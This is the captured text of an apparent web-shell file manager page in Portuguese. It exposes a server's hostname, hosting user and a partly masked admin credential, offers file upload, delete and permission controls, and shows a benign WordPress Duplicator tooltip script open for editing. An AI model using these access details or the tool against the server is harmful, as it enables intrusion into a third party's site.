🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_48b46674 / b06d****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: duplicator-tooltip.js
/*! dup tooltip */ (function ($) { DuplicatorTooltip = { initialized: false, messages: { 'copy': 'Copy to clipboard', 'copied': 'copied to clipboard', 'copyUnable': 'Unable to copy' }, load: function () { if (this.initialized) { return; } this.loadSelector('[data-tooltip]'); this.loadCopySelector('[data-dup-copy-value]'); this.initialized = true; }, loadSelector: function (selector) { $(selector).each(function () { if (this._tippy) { // already init return; } tippy(this, { content: function (ref) { var header = ref.dataset.tooltipTitle; var body = ref.dataset.tooltip; var res = header !== undefined ? '<h3>' + header + '</h3>' : ''; res += '<div class="dup-tippy-content">' + body + '</div>'; return res; }, allowHTML: true, interactive: true, placement: this.dataset.tooltipPlacement ? this.dataset.tooltipPlacement : 'bottom-start', theme: 'duplicator', zIndex: 900000, appendTo: document.body }); $(this).data('dup-tooltip-loaded', true); }); }, loadCopySelector: function (selector) { $(selector).each(function () { if (this._tippy) { // already init return; } var element = $(this); if (element.hasClass('disabled')) { return; } var tippyElement = tippy(this, { allowHTML: true, placement: this.dataset.tooltipPlacement ? this.dataset.tooltipPlacement : 'bottom-start', theme: 'duplicator', zIndex: 900000, hideOnClick: false, trigger: 'manual' }); var copyTitle = element.is('[data-dup-copy-title]') ? element.data('dup-copy-title') : DuplicatorTooltip.messages.copy; tippyElement.setContent('<div class="dup-tippy-content">' + copyTitle + '</div>'); //Have to set manually otherwise might hide on click. element.mouseover(function () { tippyElement.show(); }).mouseout(function () { tippyElement.hide(); }); element.click(function () { var valueToCopy = element.data('dup-copy-value'); var copiedTitle = element.is('[data-dup-copied-title]') ? element.data('dup-copied-title') : valueToCopy + ' ' + DuplicatorTooltip.messages.copied; var message = DuplicatorTooltip.messages.copyUnable; var tmpArea = jQuery("<textarea></textarea>").css({ position: 'absolute', top: '-10000px' }).text(valueToCopy).appendTo("body"); tmpArea.select(); try { message = document.execCommand('copy') ? copiedTitle : 'Unable to copy'; } catch (err) { console.log(err); } tippyElement.setContent('<div class="dup-tippy-content">' + message + '</div>'); tippyElement.setProps({ theme: 'duplicator-filled' }); setTimeout(function () { tippyElement.setContent('<div class="dup-tippy-content">' + copyTitle + '</div>'); tippyElement.setProps({ theme: 'duplicator' }); }, 2000); }); }); }, updateElementContent: function (selector, content) { if ($(selector).get(0)) { $(selector).get(0)._tippy.setContent('<div class="dup-tippy-content">' + content + '</div>'); } }, unload: function () { var tooltips = document.querySelectorAll('[data-tooltip], [data-dup-copy-value]'); tooltips.forEach(function (element) { if (element._tippy) { element._tippy.destroy(); element._tippy = null; } }); this.initialized = false; }, reload: function () { this.unload(); this.load(); } } })(jQuery);
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar